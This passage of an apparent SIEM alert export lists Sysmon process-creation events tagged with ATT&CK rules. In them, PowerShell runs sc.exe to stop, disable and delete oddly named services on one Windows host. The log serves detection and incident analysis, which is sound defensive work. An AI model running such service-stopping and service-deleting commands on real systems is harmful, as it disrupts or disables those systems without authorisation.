+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.909258000Z"",""eventRecordID"":""3429"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.905\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010a54b2e00}\r\nProcessId: 5584\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.905"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010a54b2e00}"",""processId"":""5584"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.639",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.884 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00} +ProcessId: 696 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.887272000Z"",""eventRecordID"":""3428"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.884\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.884"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.403",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.838 
+ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001085482e00} +ProcessId: 4728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.841285800Z"",""eventRecordID"":""3425"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.838\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001085482e00}\r\nProcessId: 4728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.838"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001085482e00}"",""processId"":""4728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:20:28.306",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.784 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108b452e00} +ProcessId: 7600 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.787867700Z"",""eventRecordID"":""3422"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.784\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108b452e00}\r\nProcessId: 7600\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.784"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00108b452e00}"",""processId"":""7600"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.264",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.765 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001025442e00} +ProcessId: 4788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.767882900Z"",""eventRecordID"":""3421"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.765\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001025442e00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.765"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001025442e00}"",""processId"":""4788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.222",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.729 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001063422e00} +ProcessId: 880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.731706200Z"",""eventRecordID"":""3419"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.729\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001063422e00}\r\nProcessId: 880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:59.729"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001063422e00}"",""processId"":""880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.135",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.672 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010e63f2e00} +ProcessId: 7336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
